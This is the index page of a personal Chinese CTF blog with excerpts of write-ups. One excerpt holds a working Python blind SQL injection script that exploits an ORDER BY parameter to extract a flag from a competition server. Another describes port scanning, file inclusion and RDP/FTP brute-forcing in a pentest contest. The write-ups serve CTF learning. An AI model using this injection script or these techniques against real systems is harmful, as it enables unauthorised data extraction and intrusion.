Fork me on GitHub
Y's blog


  • 首页

  • 关于

  • 标签

  • 分类

  • 归档

  • 日程表

bestphp's revenge

发表于 2018-11-22 | 分类于 CTF

LCTF2018——bestphp’s revenge

阅读全文 »

hacklu---baby_php

发表于 2018-10-17 | 分类于 CTF

hacklu CTF 2018

闲来无事,打开hacklu,开始做(发)题(呆)!,web狗是没出路了。

阅读全文 »

周周练

发表于 2018-09-19

WEB

  • 简单order注入

    • 提示是order注入,网上查了资料,学习了一波,源码里提示: select flag from flag,省去爆表名列名了,直接爆数据
    • 盲注脚本:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import requests
    flag = ''
    url = 'http://101.71.29.5:10001/?order=(select+1+regexp+if(ord(substring((select+flag+from+flag+limit+0,1),{},1))={},1,0x00))%23&button=submit'
    for i in range(24,28):
    for j in range(32,127):
    u = url.format(i,j)
    #print(u)
    if ('fangzhang' not in requests.get(u).text):
    flag += chr(j)
    print(flag)
    break
    print(flag)
  • 签到题不会,呜呜呜

阅读全文 »

LOLI

发表于 2018-07-23 | 分类于 python

LOLI

chr() 在 python2 python3 中的区别

阅读全文 »

铁人三项第七赛区企业赛wp

发表于 2018-05-12 | 分类于 渗透

首先给了ip段,202.1.8.50-60

我们能用nmap扫到的是50,52,60

202.1.8.50开放了web服务,ftp服务,还开了3389

版本是windows sever2003 sp2

先访问80端口,撸猫大战- -

源代码里给的提示是Tips.php

刚看完队友已经文件包含读到Tips.php的源码,

1
内容是:Have you ever heard of SNMP informaiton treasure?

猜测应该是和snmp服务有关。

还读到了flag.php,成功拿到第一个flag!

flag4

之后思路错了,开始爆3389和ftp,无果。

阅读全文 »
12
爱鸭鸭

爱鸭鸭

7 日志
3 分类
4 标签
© 2018 爱鸭鸭
本站访客数:
由 鸭鸭 强力驱动
|
主题 — NexT.Pisces v5.1.4